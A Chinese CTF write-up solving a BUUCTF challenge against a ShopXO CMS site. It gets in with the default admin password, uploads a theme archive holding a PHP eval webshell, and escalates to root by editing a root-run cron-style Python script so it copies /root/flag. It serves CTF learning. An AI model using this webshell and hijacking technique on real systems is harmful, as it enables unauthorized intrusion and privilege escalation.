【学习笔记 21】 buu [GKCTF2020]老八小超市儿

0x00 知识点

web安全渗透，后渗透提权

ps：想要看我之前的文章请点击如下链接
点我点我

00x1 解题思路

一看题目就是一道有味道的ctf题，打开一看发现是个（粉粉嫩的）网站shopxocms的网站，百度搜索对应的网站漏洞，说是后台有地方可以利用压缩包getshell，尝试一下发现是admin.php就能打开对应的后台登录界面，并且知道了初始登录用户名admin，密码shopox，直接登录后台
登陆进去后在应用中心->应用商店->主题的第一个默认主题，下载下来

用其中任意一个压缩包，用压缩软件打开（注意：这里一定不要解压就是单纯打开），并在default/_static添加一个a.php文件其中a.php文件内容是

    @eval($_POST[a]);
    phpinfo(); 
?>

之后去如下图所在的位置上传刚刚处理好的压缩包，该压缩包会在上传后直接解压，并可以访问到
上传好后可以在利用当前主题中照片的链接可以找到这个压缩包中对应的路径，具体路径如下

http://07317d9b-948e-4934-a0d3-4f723f143894.node3.buuoj.cn/public/static/index/default/a.php

具体打开效果如图
接下来不用想接下来肯定是连马了，但是很难受的是其他人都是用蚁剑连的，但是我的蚁剑缺少核心源码不能用，之后尝试菜刀和冰蝎都连不上，最后还是用cknife连马成功
之后在根目录里找到三个可疑文件

flag

flag{this_is_fake_flag/true_flag_in_/root}

假的flag却提示到了flag文件在root，但是root却没有权限看
flag.hint

Wed Jun 24 11:12:44 2020
Get The RooT,The Date Is Useful!

auto.sh

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

这个bash脚本显示没60秒执行一次这个路径下的/var/mail/makeflaghint.py对应的python脚本
来查看对应的python脚本的内容是什么
加载了os模块，那也没有什么有用的信息，但是我们可以修改这个脚本在里面添加内容来让这个脚本直接读取root里的flag文件，添加内容如下

ff = io.open("/root/flag", "rb+")
f.write(str(ff.read()))

之后就可以去flag.hint文件里查看flag了